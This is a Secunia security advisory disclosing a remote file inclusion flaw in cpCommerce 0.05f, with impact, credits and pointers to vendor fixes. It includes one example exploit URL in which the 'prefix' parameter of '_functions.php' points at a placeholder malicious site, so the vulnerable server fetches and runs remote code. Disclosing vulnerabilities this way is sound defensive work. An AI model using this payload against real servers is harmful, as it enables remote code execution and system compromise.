TITLE:
cpCommerce Arbitrary File Inclusion Vulnerability

SECUNIA ADVISORY ID:
SA10034

VERIFY ADVISORY:
http://www.secunia.com/advisories/10034/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
cpCommerce 0.x

DESCRIPTION:
A vulnerability has been reported in cpCommerce, which can be
exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to an input validation error in
"_functions.php". This can be exploited to execute arbitrary code on
a vulnerable system by supplying a path to a malicious file on a
remote system in the "$prefix" variable.

Example, which includes "http://[malicious_site]/index_config.php"
and "http://[malicious_site]/index_gateways.php":

http://[victim]/[path_of_cpcommerce]/_functions.php?prefix=http://[malicious_site]/index

The vulnerability has been reported in version 0.05f. Prior versions
may also be affected.

SOLUTION:
The vendor has posted some solutions at:
http://cpcommerce.org/#fixes

REPORTED BY / CREDITS:
Astharot, Zone-H.

ORIGINAL ADVISORY:
ZH2003-31SA:
http://www.zone-h.org/en/advisories/read/id=3284/

----------------------------------------------------------------------

Secunia recommends that you verify all advisories you receive, by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.

Contact details:
Web	: http://www.secunia.com/
E-mail	: support@secunia.com
Tel	: +45 7020 5144
Fax	: +45 7020 5145

----------------------------------------------------------------------

Unsubscribe: Secunia Security Advisories
http://www.secunia.com/sec_adv_unsubscribe/?email=packet@packetstormsecurity.org

----------------------------------------------------------------------